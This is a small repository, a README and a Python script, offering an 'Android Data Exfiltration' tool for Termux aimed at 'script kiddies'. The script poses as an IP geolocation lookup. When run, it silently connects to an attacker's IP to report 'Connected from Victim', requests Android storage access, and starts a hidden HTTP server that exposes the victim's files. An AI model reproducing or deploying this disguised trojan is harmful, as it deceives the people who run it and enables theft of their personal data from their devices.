├── README.md └── exfil.py /README.md: -------------------------------------------------------------------------------- 1 | # Android Data Exfiltration -Termux 2 | Hack the script kiddies 3 | 4 | 5 | reference video: https://www.youtube.com/watch?v=v4GBvzEf7oU 6 | -------------------------------------------------------------------------------- /exfil.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import http.server 3 | import socketserver 4 | import threading 5 | import _thread 6 | import socket 7 | import requests 8 | import os 9 | 10 | 11 | def reverse(): 12 | soc = socket.socket() 13 | ip="attacker" #Enter an attacker IP 14 | port=667 #Attacker port 15 | soc.connect((ip,port)) 16 | soc.send(bytes("Connected from Victim","utf-8")) 17 | os.system('termux-setup-storage') #storage access for android 18 | 19 | reverse() 20 | 21 | def create_server(): 22 | class QuietHandler(http.server.SimpleHTTPRequestHandler): 23 | def log_message(self, format, *args): 24 | pass 25 | with socketserver.TCPServer(("", 2002), QuietHandler) as httpd: 26 | httpd.serve_forever() 27 | 28 | _thread.start_new_thread(create_server,()) 29 | 30 | 31 | def web(): 32 | inp = input("Enter the IP: ") 33 | if inp == 'Q': 34 | print('Bye') 35 | exit() 36 | else: 37 | req =requests.get("http://api.hackertarget.com/geoip/?q="+inp) 38 | print(req.text) 39 | 40 | while True: 41 | banner=""" 42 | _ 43 | | | 44 | ___ __ _ _ _ | |__ ___ ___ _ __ 45 | / __|/ _` | | | | | '_ \ / _ \/ _ \ '_ \ 46 | \__ \ (_| | |_| | | |_) | __/ __/ |_) | 47 | |___/\__,_|\__, | |_.__/ \___|\___| .__/ 48 | __/ | | | 49 | |___/ |_| 50 | Q for Exit """ 51 | print(banner) 52 | web() 53 | 54 | 55 | 56 | 57 | 58 | --------------------------------------------------------------------------------